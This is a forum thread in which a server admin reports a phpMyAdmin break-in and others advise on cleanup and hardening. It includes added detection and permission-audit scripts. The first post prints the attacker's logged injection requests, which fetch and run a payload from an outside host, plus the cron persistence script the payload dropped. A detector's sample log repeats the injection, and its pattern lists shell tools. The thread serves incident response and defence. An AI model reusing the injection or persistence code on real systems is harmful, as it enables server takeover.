marxin (n00b) | Joined: 28 Oct 2005 | Posts: 28
Posted: Sun Nov 15, 2009 9:38 pm | Post subject: Hacked via Apache, how to prevent
Hello everyone,
My Apache got hacked via phpMyAdmin. I found in the Apache access_log that a command had been launched with the following code:

```text
88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /phpmyadmin/config/config.inc.php?p=phpinfo();c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 180
88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 44132
```
ls of my phpmyadmin directory:

```sh
ls -l /var/www/localhost/htdocs/phpmyadmin/ | grep config
```

```text
drwxr-xrwx 4 apache apache 224 Nov 15 22:32 config
```
All files for the hack were downloaded to a directory; here is its ls:

```text
marxin_server .pid # ls
1 b2 cron.d f fuck h init j2 mech.pid mech.set r sl stream v x
b bang.txt dir f4 fwd h.c j mech.levels mech.session plm.seen s std tty v2 y2kupdate
```
Code of the script which was executed at the start of the hack:

```sh
#!/bin/sh
pwd > dir
dir=$(cat dir)
echo "* * * * * $dir/y2kupdate >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep y2kupdate
echo "#!/bin/sh
if test -r $dir/mech.pid; then
pid=\$(cat $dir/mech.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./r &>/dev/null" > y2kupdate
chmod u+x y2kupdate
```
Thank you for your advice, and I hope you will help me fix this hole in my server.
marxin
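Reading an access_log for this kind of request by hand does not scale. The following is an added example (not from the thread): it pulls the request target out of each log line, decodes the percent-encoded query string and flags lines that chain a shell command, run over constructed sample lines modelled on the two above (the attacker's download host is replaced by a documentation address).

```shell
#!/bin/sh
# Added example (not from the thread): flag access_log requests whose query
# string carries a chained shell command, the pattern in the log lines above.

# Request target (path + query) from a common/combined log line.
request_target() {
    printf '%s\n' "$1" | sed -n 's/^[^"]*"[A-Z]* \([^ ]*\) HTTP\/[0-9.]*".*$/\1/p'
}

# Decode the percent-encodings that hide spaces and shell metacharacters.
url_decode() {
    printf '%s\n' "$1" | sed -e 's/%20/ /g' -e 's/%3[Bb]/;/g' -e 's/%7[Cc]/|/g' \
        -e 's/%26/\&/g' -e 's/%60/`/g' -e 's/%24/$/g'
}

# True when a decoded query value starts a command, or chains one after ; | & or `.
looks_injected() {
    target=$(request_target "$1")
    case "$target" in *\?*) ;; *) return 1 ;; esac
    query=$(url_decode "${target#*\?}")
    printf '%s\n' "$query" | grep -Eq '(^|[=;&|`])[[:space:]]*(cd|wget|curl|chmod|tar|rm|perl|sh) '
}

# Print "client_ip<TAB>decoded request" for each suspicious line read from stdin.
flag_suspicious() {
    while IFS= read -r line; do
        if looks_injected "$line"; then
            printf '%s\t%s\n' "${line%% *}" "$(url_decode "$(request_target "$line")")"
        fi
    done
}

count_suspicious() { flag_suspicious | wc -l | tr -d ' '; }

# Constructed sample log: lines 1 and 3 follow the post's attack requests, with the
# download host replaced by a documentation address; lines 2 and 4 are normal traffic.
SAMPLE_LOG='88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /phpmyadmin/config/config.inc.php?p=phpinfo();c=cd%20/tmp;wget%20http://198.51.100.7/bh.tgz;tar%20xvf%20bh.tgz HTTP/1.1" 200 180
192.0.2.10 - - [07/Nov/2009:00:09:01 +0100] "GET /phpmyadmin/index.php?lang=en&server=1 HTTP/1.1" 200 8020
88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /?c=cd%20/tmp;wget%20http://198.51.100.7/bh.tgz HTTP/1.1" 200 44132
192.0.2.11 - - [07/Nov/2009:00:10:12 +0100] "GET /phpmyadmin/css/phpmyadmin.css.php?token=abc HTTP/1.1" 200 10211'

printf '%s\n' "$SAMPLE_LOG" | flag_suspicious
```

Feed a real log with `flag_suspicious < /var/log/apache2/access_log`; the decoder only covers the encodings relevant to shell chaining, so extend it if your logs show others.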
cach0rr0 (Bodhisattva) | Joined: 13 Nov 2008 | Posts: 4123 | Location: Houston, Republic of Texas
Posted: Mon Nov 16, 2009 5:38 am
So, my first thoughts:
- I personally despise mod_security, and also despise the idea of running regex against web requests in general, never mind doing so as a component of Apache itself; nonetheless, updated mod_security rules will protect against most of these hacks.
- This is an ancient hack, and has likely been fixed in more recent revisions of phpmyadmin.
- If you can, I would protect phpmyadmin with .htaccess/.htpasswd, meaning require form-based auth before anyone can even get TO a position where they can attack phpmyadmin. For example, put this in .htaccess:
```apache
AuthUserFile /var/www/passwords
AuthName "Restricted Access"
AuthType Basic
require valid-user
```
then create that file via

```sh
htpasswd -c /var/www/passwords someusername
<enter your password twice when prompted>
```
To add subsequent users, omit the -c switch:

```sh
htpasswd /var/www/passwords anotherusername
```
In short, password-protect the phpmyadmin directory.
Just in general this should be done; do not give attackers a chance to attack your application directly, make them brute-force an Apache password if they want to even have a CHANCE to attack an application.
I do this with everything that isn't a standard html page. I *ESPECIALLY* do this with very common webapps, such as phpmyadmin, Horde, etc.
Now, with regards to tidying up your server, I would highly recommend, if you have physical access, booting from a thumb drive or CD/DVD and running rkhunter, chkrootkit, and even clamscan (ClamAV). Personally, after even the slightest hack I stop trusting my server, back things up, blow the server away and rebuild, but I'm paranoid in that respect.
Hope that helps.
aidanjt (Veteran) | Joined: 20 Feb 2005 | Posts: 1118 | Location: Rep. of Ireland
Posted: Mon Nov 16, 2009 5:45 am
Why is your phpmyadmin dir even apache-writable in the first place?

```sh
chown -R root:apache * && find -type d -exec chmod 750 {} \; && find -type f -exec chmod 640 {} \;
```
That will close off that nasty little hole.
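As an added example (not aidanjt's code), the script below lists everything under a webroot that the httpd account could write, then applies the chown/chmod fix from the post and audits again. The account name `apache` (as in the ls output above), the group name and the temporary demo tree are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): find what the httpd account could modify under a
# webroot, then apply the chown/chmod fix from the post above. Demonstrated on a temp tree.
WEB_USER=${WEB_USER:-apache}        # assumed httpd account name, as in the post's ls output
WEB_GROUP=${WEB_GROUP:-$WEB_USER}   # assumed httpd group

# Print every path under $1 the web server could write: world-writable, or (when the
# account exists on this host) owned by the web user with u+w, or in the web group with g+w.
audit_webroot() {
    if id "$WEB_USER" >/dev/null 2>&1 && getent group "$WEB_GROUP" >/dev/null 2>&1; then
        find "$1" -mindepth 1 \( -perm -o+w -o \( -user "$WEB_USER" -perm -u+w \) \
            -o \( -group "$WEB_GROUP" -perm -g+w \) \) -print
    else
        find "$1" -mindepth 1 -perm -o+w -print
    fi | sort
}

count_writable() { audit_webroot "$1" | wc -l | tr -d ' '; }

# The fix from the post: owner $2, group $3 (the httpd group, so it can still read),
# directories 750, files 640. Anything the app legitimately writes (uploads, a config
# generated by a setup script) then needs a deliberate, narrow exception.
harden_webroot() {
    chown -R "$2:$3" "$1" &&
    find "$1" -type d -exec chmod 750 {} + &&
    find "$1" -type f -exec chmod 640 {} +
}

# Constructed demo tree, not a real webroot: a world-writable config dir like the
# drwxr-xrwx one in the first post.
demo=$(mktemp -d)
mkdir -p "$demo/phpmyadmin/config"
chmod 755 "$demo/phpmyadmin"
chmod 757 "$demo/phpmyadmin/config"
touch "$demo/phpmyadmin/index.php"
chmod 644 "$demo/phpmyadmin/index.php"
echo "before: $(count_writable "$demo") writable path(s)"
harden_webroot "$demo" "$(id -un)" "$(id -gn)"
echo "after:  $(count_writable "$demo") writable path(s)"
rm -rf "$demo"
```

On a real host run `audit_webroot /var/www/localhost/htdocs` first and review the list before hardening, because anything in it is either the hole or a write path the application depends on.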
Hu (Administrator) | Joined: 06 Mar 2007 | Posts: 23100
Posted: Tue Nov 17, 2009 3:58 am
Why was /tmp mounted -o exec on a system with PHP installed?
Whoever wrote that hack should be smacked. That is a terrible shell script! First, there is no need to write the current directory to a temporary file just to load it into a variable. Second, crontab can be given data on stdin, so no need for the temporary cron.d, either. Third, the if test to see if anything was killed is wrong. Since all output is redirected to null, it is guaranteed to produce no output. The attacker should have tested the return code of the kill, not the amount of output it generated. Finally, since the attacker apparently wanted all output discarded, he should have just redirected output at the top of the script, rather than doing it for every child.